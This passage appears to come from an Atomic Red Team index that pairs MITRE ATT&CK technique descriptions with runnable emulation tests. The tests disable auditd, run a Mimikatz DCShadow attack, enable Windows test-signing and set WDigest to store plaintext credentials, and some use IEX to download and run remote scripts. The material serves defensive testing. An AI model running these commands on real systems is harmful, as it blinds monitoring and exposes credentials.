auto_generated_guid: 7906f0a6-b527-46ee-9026-6e81a9184e08
description: 'The command `auditctl -e 0` disables the audit system. By setting
the parameter to `0`, auditing is deactivated, halting the monitoring and
recording of security-related events. This action stops the generation of
audit logs, ceasing the collection of data regarding system activities. Disabling
auditing may be done for various reasons, such as troubleshooting, performance
optimization, or temporarily suspending auditing requirements, but it reduces
visibility into system events and can impact security monitoring and compliance
efforts.
'
supported_platforms:
- linux
dependency_executor_name: sh
dependencies:
- description: 'Check if auditd is installed.
'
prereq_command: 'if [ $(command -v auditctl) ]; then exit 0; else exit 1;
fi
'
get_prereq_command: "(yum install auditd -y) || (apt-get install auditd -y)
|| (dnf install auditd -y)\n"
executor:
command: 'auditctl -e 0
'
name: sh
elevation_required: true
cleanup_command: 'auditctl -e 1
'
T1207:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--564998d8-ab3e-4123-93fb-eccaa6b9714a
created: '2018-04-18T17:59:24.739Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1207
external_id: T1207
- source_name: DCShadow Blog
description: Delpy, B. & LE TOUX, V. (n.d.). DCShadow. Retrieved March 20,
2018.
url: https://www.dcshadow.com/
- source_name: Adsecurity Mimikatz Guide
description: Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz
& Command Reference. Retrieved December 23, 2015.
url: https://adsecurity.org/?page_id=1821
- source_name: GitHub DCSYNCMonitor
description: Spencer S. (2018, February 22). DCSYNCMonitor. Retrieved March
30, 2018.
url: https://github.com/shellster/DCSYNCMonitor
- source_name: Microsoft DirSync
description: Microsoft. (n.d.). Polling for Changes Using the DirSync Control.
Retrieved March 30, 2018.
url: https://msdn.microsoft.com/en-us/library/ms677626.aspx
- source_name: ADDSecurity DCShadow Feb 2018
description: Lucand,G. (2018, February 18). Detect DCShadow, impossible?.
Retrieved March 30, 2018.
url: https://adds-security.blogspot.fr/2018/02/detecter-dcshadow-impossible.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:48.823Z'
name: Rogue Domain Controller
description: |-
Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.
Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)
This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Vincent Le Toux
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.2'
identifier: T1207
atomic_tests:
- name: DCShadow (Active Directory)
auto_generated_guid: 0f4c5eb0-98a0-4496-9c3d-656b4f2bc8f6
description: |
Use Mimikatz DCShadow method to simulate behavior of an Active Directory Domain Controller and edit protected attribute.
[DCShadow](https://www.dcshadow.com/)
[Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)
It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with:
Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount
Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely.
The easiest is to run elevated and as a Domain Admin user.
supported_platforms:
- windows
input_arguments:
object:
description: Targeted object (for machine account do not forget to add final
'$')
type: string
default: bruce.wayne
attribute:
description: 'Object attribute to edit, interesting ones: badpwdcount, primaryGroupId,
SIDHistory...'
type: string
default: badpwdcount
value:
description: Value to assign to object attribute
type: string
default: '9999'
mimikatz_path:
description: Mimikatz windows executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\mimikatz\x64\mimikatz.exe
psexec_path:
description: Path to PsExec
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\PSTools\PsExec.exe
dependency_executor_name: powershell
dependencies:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
'
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
get_prereq_command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX
(iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-FetchFromZip.ps1\"
-UseBasicParsing) \n$releases = \"https://api.github.com/repos/gentilkiwi/mimikatz/releases\"\n$zipUrl
= (Invoke-WebRequest $releases | ConvertFrom-Json)[0].assets.browser_download_url
| where-object { $_.endswith(\".zip\") }\n$mimikatz_exe = cmd /c echo #{mimikatz_path}\n$basePath
= Split-Path $mimikatz_exe | Split-Path\nInvoke-FetchFromZip $zipUrl \"x64/mimikatz.exe\"
$basePath\n"
- description: 'PsExec tool from Sysinternals must exist on disk at specified
location (#{psexec_path})
'
prereq_command: 'if (Test-Path "#{psexec_path}") { exit 0} else { exit 1}
'
get_prereq_command: |
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip"
Expand-Archive "PathToAtomicsFolder\..\ExternalPayloads\PsTools.zip" "PathToAtomicsFolder\..\ExternalPayloads\PsTools" -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item "PathToAtomicsFolder\..\ExternalPayloads\PsTools\PsExec.exe" "#{psexec_path}" -Force
executor:
name: powershell
elevation_required: true
command: |
# starting fake DC server, as SYSTEM (required)
$dc_output_file = "PathToAtomicsFolder\..\ExternalPayloads\art-T1207-mimikatz-DC.log"
Remove-Item $dc_output_file -ErrorAction Ignore
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c '#{psexec_path}' /accepteula -d -s #{mimikatz_path} $mimikatzParam"
# wait for fake DC server to be ready...
Start-Sleep -Seconds 5
# server ready, so trigger replication (push) and wait until it finished
& "#{mimikatz_path}" "lsadump::dcshadow /push" "exit"
Write-Host "`nWaiting for fake DC server to return"
Wait-Process $dc
Write-Host "`nOutput from fake DC server:"
Get-Content $dc_output_file
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
Remove-Item $dc_output_file -ErrorAction Ignore
Write-Host "End of DCShadow"
cleanup_command: 'Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore
'
T1553.006:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--565275d5-fcc3-4b66-b4e7-928e4cac6b8c
created: '2021-04-23T01:04:57.161Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1553/006
external_id: T1553.006
- source_name: Apple Disable SIP
description: Apple. (n.d.). Disabling and Enabling System Integrity Protection.
Retrieved April 22, 2021.
url: https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection
- source_name: F-Secure BlackEnergy 2014
description: 'F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence
of crimeware and APT attacks. Retrieved March 24, 2016.'
url: https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf
- source_name: FireEye HIKIT Rootkit Part 2
description: 'Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit:
Advanced and Persistent Attack Techniques (Part 2). Retrieved November 17,
2024.'
url: https://web.archive.org/web/20210920172620/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html
- source_name: Microsoft Unsigned Driver Apr 2017
description: Microsoft. (2017, April 20). Installing an Unsigned Driver during
Development and Test. Retrieved April 22, 2021.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test
- source_name: Microsoft DSE June 2017
description: Microsoft. (2017, June 1). Digital Signatures for Kernel Modules
on Windows. Retrieved April 22, 2021.
url: https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN
- source_name: Microsoft TESTSIGNING Feb 2021
description: Microsoft. (2021, February 15). Enable Loading of Test Signed
Drivers. Retrieved April 22, 2021.
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option
- source_name: Unit42 AcidBox June 2020
description: 'Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare
Malware Repurposing Turla Group Exploit Targeted Russian Organizations.
Retrieved March 16, 2021.'
url: https://unit42.paloaltonetworks.com/acidbox-rare-malware/
- source_name: GitHub Turla Driver Loader
description: TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved
April 22, 2021.
url: https://github.com/hfiref0x/TDL
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:48.927Z'
name: 'Subvert Trust Controls: Code Signing Policy Modification'
description: "Adversaries may modify code signing policies to enable execution
of unsigned or self-signed code. Code signing provides a level of authenticity
on a program from a developer and a guarantee that the program has not been
tampered with. Security controls can include enforcement mechanisms to ensure
that only valid, signed code can be run on an operating system. \n\nSome of
these security controls may be enabled by default, such as Driver Signature
Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation:
Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls
may be disabled by default but are configurable through application controls,
such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a
system. Since it can be useful for developers to modify default signature
enforcement policies during the development and testing of applications, disabling
of these features may be possible with elevated permissions.(Citation: Microsoft
Unsigned Driver Apr 2017)(Citation: Apple Disable SIP)\n\nAdversaries may
modify code signing policies in a number of ways, including through use of
command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112),
rebooting the computer in a debug/recovery mode, or by altering the value
of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation:
Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub
Turla Driver Loader) Examples of commands that can modify the code signing
policy of a system include bcdedit.exe -set TESTSIGNING ON on
Windows and csrutil disable on macOS.(Citation: Microsoft TESTSIGNING
Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful
modification of a signing policy may require reboot of the compromised system.
Additionally, some implementations can introduce visible artifacts for the
user (ex: a watermark in the corner of the screen stating the system is in
Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure
BlackEnergy 2014)\n\nTo gain access to kernel memory to modify variables related
to signature checks, such as modifying g_CiOptions to disable
Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege
Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but
vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla
Driver Loader)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Abel Morales, Exabeam
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- macOS
x_mitre_version: '1.1'
identifier: T1553.006
atomic_tests:
- name: Code Signing Policy Modification
auto_generated_guid: bb6b51e1-ab92-45b5-aeea-e410d06405f8
description: Allows adversaries to subvert trust controls by modifying the code
signing policy, enabling the execution of unsigned drivers.
supported_platforms:
- windows
executor:
command: bcdedit /set testsigning on
cleanup_command: bcdedit /set testsigning off
name: command_prompt
elevation_required: true
T1610:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--56e0d8b8-3e25-49dd-9050-3aa252f5aa92
created: '2021-03-29T16:51:26.020Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1610
external_id: T1610
- source_name: AppSecco Kubernetes Namespace Breakout 2020
description: Abhisek Datta. (2020, March 18). Kubernetes Namespace Breakout
using Insecure Host Path Volume — Part 1. Retrieved January 16, 2024.
url: https://blog.appsecco.com/kubernetes-namespace-breakout-using-insecure-host-path-volume-part-1-b382f2a6e216
- source_name: Aqua Build Images on Hosts
description: 'Assaf Morag. (2020, July 15). Threat Alert: Attackers Building
Malicious Images on Your Hosts. Retrieved March 29, 2021.'
url: https://blog.aquasec.com/malicious-container-image-docker-container-host
- source_name: Docker Containers API
description: Docker. (n.d.). Docker Engine API v1.41 Reference - Container.
Retrieved March 29, 2021.
url: https://docs.docker.com/engine/api/v1.41/#tag/Container
- source_name: Kubernetes Workload Management
description: Kubernetes. (n.d.). Workload Management. Retrieved March 28,
2024.
url: https://kubernetes.io/docs/concepts/workloads/controllers/
- source_name: Kubeflow Pipelines
description: The Kubeflow Authors. (n.d.). Overview of Kubeflow Pipelines.
Retrieved March 29, 2021.
url: https://www.kubeflow.org/docs/components/pipelines/overview/pipelines-overview/
- source_name: Kubernetes Dashboard
description: The Kubernetes Authors. (n.d.). Kubernetes Web UI (Dashboard).
Retrieved March 29, 2021.
url: https://kubernetes.io/docs/tasks/access-application-cluster/web-ui-dashboard/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.017Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
Containers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow. (Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) In Kubernetes environments, containers may be deployed through workloads such as ReplicaSets or DaemonSets, which can allow containers to be deployed across multiple nodes.(Citation: Kubernetes Workload Management) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: execution
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Pawan Kinger, @kingerpawan, Trend Micro
- Alfredo Oliveira, Trend Micro
- Idan Frimark, Cisco
- Center for Threat-Informed Defense (CTID)
- Magno Logan, @magnologan, Trend Micro
- Ariel Shuper, Cisco
- Vishwas Manral, McAfee
- Yossi Weizman, Azure Defender Research Team
- Joas Antonio dos Santos, @C0d3Cr4zy
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Containers
x_mitre_version: '1.4'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
auto_generated_guid: 59aa6f26-7620-417e-9318-589e0fb7a372
description: "Adversaries may deploy containers based on retrieved or built
malicious images or from benign images that download and execute malicious
payloads at runtime. They can do this using docker create and docker start
commands. Kinsing & Doki was exploited using this technique. \n"
supported_platforms:
- containers
dependency_executor_name: sh
dependencies:
- description: Verify docker is installed.
prereq_command: 'which docker
'
get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
echo "Docker installed"; fi
'
- description: Verify docker service is running.
prereq_command: 'sudo systemctl status docker --no-pager
'
get_prereq_command: 'sudo systemctl start docker
'
executor:
command: |
docker build -t t1610 $PathtoAtomicsFolder/T1610/src/
docker run --name t1610_container --rm -itd t1610 bash /tmp/script.sh
name: bash
cleanup_command: "docker stop t1610_container\ndocker rmi -f t1610:latest
\n"
T1112:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4
created: '2017-05-31T21:31:23.587Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1112
external_id: T1112
- source_name: CISA Russian Gov Critical Infra 2018
description: CISA. (2018, March 16). Russian Government Cyber Activity Targeting
Energy and Other Critical Infrastructure Sectors. Retrieved March 24, 2025.
url: https://www.cisa.gov/news-events/alerts/2018/03/15/russian-government-cyber-activity-targeting-energy-and-other-critical-infrastructure-sectors
- source_name: CISA LockBit 2023
description: 'CISA. (2023, March 16). #StopRansomware: LockBit 3.0. Retrieved
March 24, 2025.'
url: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-075a
- source_name: Avaddon Ransomware 2021
description: 'Javier Yuste and Sergio Pastrana. (2021). Avaddon ransomware:
an in-depth analysis and decryption of infected systems. Retrieved March
24, 2025.'
url: https://arxiv.org/pdf/2102.04796
- source_name: Microsoft BlackCat Jun 2022
description: Microsoft Defender Threat Intelligence. (2022, June 13). The
many lives of BlackCat ransomware. Retrieved December 20, 2022.
url: https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/
- source_name: Microsoft Reg
description: Microsoft. (2012, April 17). Reg. Retrieved May 1, 2015.
url: https://technet.microsoft.com/en-us/library/cc732643.aspx
- source_name: Microsoft Remote
description: Microsoft. (n.d.). Enable the Remote Registry Service. Retrieved
May 1, 2015.
url: https://technet.microsoft.com/en-us/library/cc754820.aspx
- source_name: Microsoft 4657 APR 2017
description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4657(S): A registry
value was modified. Retrieved August 9, 2018.'
url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4657
- source_name: SpectorOps Hiding Reg Jul 2017
description: Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect.
Retrieved August 9, 2018.
url: https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353
- source_name: Microsoft Reghide NOV 2006
description: Russinovich, M. & Sharkey, K. (2006, January 10). Reghide. Retrieved
August 9, 2018.
url: https://docs.microsoft.com/sysinternals/downloads/reghide
- source_name: Microsoft RegDelNull July 2016
description: Russinovich, M. & Sharkey, K. (2016, July 4). RegDelNull v1.11.
Retrieved August 10, 2018.
url: https://docs.microsoft.com/en-us/sysinternals/downloads/regdelnull
- source_name: TrendMicro POWELIKS AUG 2014
description: 'Santos, R. (2014, August 1). POWELIKS: Malware Hides In Windows
Registry. Retrieved August 9, 2018.'
url: https://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
- source_name: Unit42 BabyShark Feb 2019
description: Unit 42. (2019, February 22). New BabyShark Malware Targets U.S.
National Security Think Tanks. Retrieved October 7, 2019.
url: https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:48:49.294Z'
name: Modify Registry
description: |-
Adversaries may interact with the Windows Registry as part of a variety of other techniques to aid in defense evasion, persistence, and execution.
Access to specific areas of the Registry depends on account permissions, with some keys requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification.(Citation: Microsoft Reg) Other tools, such as remote access tools, may also contain functionality to interact with the Registry through the Windows API.
The Registry may be modified in order to hide configuration information or malicious payloads via [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027).(Citation: Unit42 BabyShark Feb 2019)(Citation: Avaddon Ransomware 2021)(Citation: Microsoft BlackCat Jun 2022)(Citation: CISA Russian Gov Critical Infra 2018) The Registry may also be modified to [Impair Defenses](https://attack.mitre.org/techniques/T1562), such as by enabling macros for all Microsoft Office products, allowing privilege escalation without alerting the user, increasing the maximum number of allowed outbound requests, and/or modifying systems to store plaintext credentials in memory.(Citation: CISA LockBit 2023)(Citation: Unit42 BabyShark Feb 2019)
The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system.(Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.
Finally, Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API.(Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence.(Citation: TrendMicro POWELIKS AUG 2014)(Citation: SpectorOps Hiding Reg Jul 2017)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Bartosz Jerzman
- Travis Smith, Tripwire
- David Lu, Tripwire
- Gerardo Santos
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '2.0'
identifier: T1112
atomic_tests:
- name: Modify Registry of Current User Profile - cmd
auto_generated_guid: 1324796b-d0f6-455a-b4ae-21ffee6aa6b9
description: |
Modify the registry of the currently logged in user using reg.exe via cmd console. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the new entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced.
supported_platforms:
- windows
executor:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
'
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f >nul 2>&1
'
name: command_prompt
- name: Modify Registry of Local Machine - cmd
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
description: |
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
supported_platforms:
- windows
input_arguments:
new_executable:
description: New executable to run on startup instead of Windows Defender
type: string
default: calc.exe
executor:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
'
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Modify registry to store logon credentials
auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18
description: |
Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Upon execution, the message "The operation completed successfully." will be displayed.
Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
supported_platforms:
- windows
executor:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
'
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
'
name: command_prompt
elevation_required: true
- name: Use Powershell to Modify registry to store logon credentials
auto_generated_guid: 68254a85-aa42-4312-a695-38b7276307f8
description: |
Sets registry key using Powershell that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping).
Open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest.
supported_platforms:
- windows
executor:
command: 'Set-ItemProperty -Force -Path ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
-Name ''UseLogonCredential'' -Value ''1'' -ErrorAction Ignore
'
cleanup_command: 'Set-ItemProperty -Force -Path ''HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest''
-Name ''UseLogonCredential'' -Value ''0'' -ErrorAction Ignore
'
name: powershell
elevation_required: true
- name: Add domain to Trusted sites Zone
auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57
description: |
Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365.
Upon execution, details of the new registry entries will be displayed.
Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\.
https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf
supported_platforms:
- windows
input_arguments:
bad_domain:
description: Domain to add to trusted site zone
type: string
default: bad-domain.com
executor:
command: |
$key= "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
$name ="bad-subdomain"
new-item $key -Name $name -Force
new-itemproperty $key$name -Name https -Value 2 -Type DWORD;
new-itemproperty $key$name -Name http -Value 2 -Type DWORD;
new-itemproperty $key$name -Name * -Value 2 -Type DWORD;
cleanup_command: |
$key = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\#{bad_domain}\"
Remove-item $key -Recurse -ErrorAction Ignore
name: powershell
- name: Javascript in registry
auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae
description: |
Upon execution, a javascript block will be placed in the registry for persistence.
Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings.
supported_platforms:
- windows
executor:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "''"
'
name: command_prompt
T1480:
technique:
type: attack-pattern
spec_version: '2.1'
id: attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852
created: '2019-01-31T02:10:08.261Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1480
external_id: T1480
- source_name: FireEye Outlook Dec 2019
description: 'McWhirt, M., Carr, N., Bienstock, D. (2019, December 4). Breaking
the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774). Retrieved
June 23, 2020.'
url: https://www.fireeye.com/blog/threat-research/2019/12/breaking-the-rules-tough-outlook-for-home-page-attacks.html
- source_name: Trellix-Qakbot
description: Pham Duy Phuc, John Fokker J.E., Alejandro Houspanossian and
Mathanraj Thangaraju. (2023, March 7). Qakbot Evolves to OneNote Malware
Distribution. Retrieved June 7, 2024.
url: https://www.trellix.com/blogs/research/qakbot-evolves-to-onenote-malware-distribution/
- source_name: FireEye Kevin Mandia Guardrails
description: Shoorbajee, Z. (2018, June 1). Playing nice? FireEye CEO says
U.S. malware is more restrained than adversaries'. Retrieved January 17,
2019.
url: https://www.cyberscoop.com/kevin-mandia-fireeye-u-s-malware-nice/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
modified: '2025-10-24T17:49:03.764Z'
name: Execution Guardrails
description: |-
Adversaries may use execution guardrails to constrain execution or actions based on adversary supplied and environment specific conditions that are expected to be present on the target. Guardrails ensure that a payload only executes against an intended target and reduces collateral damage from an adversary’s campaign.(Citation: FireEye Kevin Mandia Guardrails) Values an adversary can provide about a target system or environment to use as guardrails may include specific network share names, attached physical devices, files, joined Active Directory (AD) domains, and local/external IP addresses.(Citation: FireEye Outlook Dec 2019)
Guardrails can be used to prevent exposure of capabilities in environments that are not intended to be compromised or operated within. This use of guardrails is distinct from typical [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497). While use of [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) may involve checking for known sandbox values and continuing with execution only if there is no match, the use of guardrails will involve checking for an expected target-specific value and only continuing with execution if there is such a match.
Adversaries may identify and block certain user-agents to evade defenses and narrow the scope of their attack to victims and platforms on which it will be most effective. A user-agent self-identifies data such as a user's software application, operating system, vendor, and version. Adversaries may check user-agents for operating system identification and then only serve malware for the exploitable software while ignoring all other operating systems.(Citation: Trellix-Qakbot)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
